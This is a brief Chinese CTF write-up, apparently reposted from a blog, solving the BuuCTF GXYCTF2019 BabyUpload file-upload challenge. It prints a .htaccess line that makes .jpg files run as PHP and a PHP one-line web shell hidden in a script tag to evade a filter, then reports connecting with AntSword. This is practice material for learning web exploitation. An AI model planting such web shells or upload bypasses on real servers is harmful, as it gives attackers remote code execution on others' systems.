BUUCTF [GXYCTF2019]BabyUpload
Posted 王小帥
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF [GXYCTF2019]BabyUpload相关的知识,希望对你有一定的参考价值。
文件上传题型。
直接上传一句话木马
可以看出是黑名单过滤, 想到上传.htaccess文件,然后上传图片马,getshell。
key.htaccess文件内容如下:
AddType application/x-httpd-php .jpg
抓包修改文件名上传成功。
接着上传图片马,发现;
猜测过滤<?;修改一句话如下:
<script language = 'php'>eval($_REQUEST[a]); </script>
构造图片马上传成功如下:
蚂蚁连接,得到flag
OK!
以上是关于BUUCTF [GXYCTF2019]BabyUpload的主要内容,如果未能解决你的问题,请参考以下文章
BUUCTF[GXYCTF2019]PingPingPing